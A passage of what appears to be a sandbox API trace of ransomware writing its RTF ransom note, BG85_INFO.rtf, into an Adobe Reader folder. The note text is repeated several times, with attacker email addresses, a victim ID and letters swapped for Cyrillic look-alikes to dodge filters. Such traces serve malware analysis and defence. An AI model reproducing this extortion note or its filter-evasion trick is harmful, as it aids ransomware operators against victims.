ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x2867358, cbMultiByte=7247, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", lpUsedDefaultChar=0x0) returned 7247 [0065.727] WriteFile (in: hFile=0x1dc, lpBuffer=0x2867358*, nNumberOfBytesToWrite=0x1c4f, lpNumberOfBytesWritten=0x395fdbc, lpOverlapped=0x0 | out: lpBuffer=0x2867358*, lpNumberOfBytesWritten=0x395fdbc*=0x1c4f, lpOverlapped=0x0) returned 1 [0065.728] CloseHandle (hObject=0x1dc) returned 1 [0065.729] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\JPN\\BG85_INFO.rtf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\jpn\\bg85_info.rtf")) returned 0xffffffff [0065.729] GetLastError () returned 0x2 [0065.729] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\JPN\\BG85_INFO.rtf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\jpn\\bg85_info.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0066.021] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur 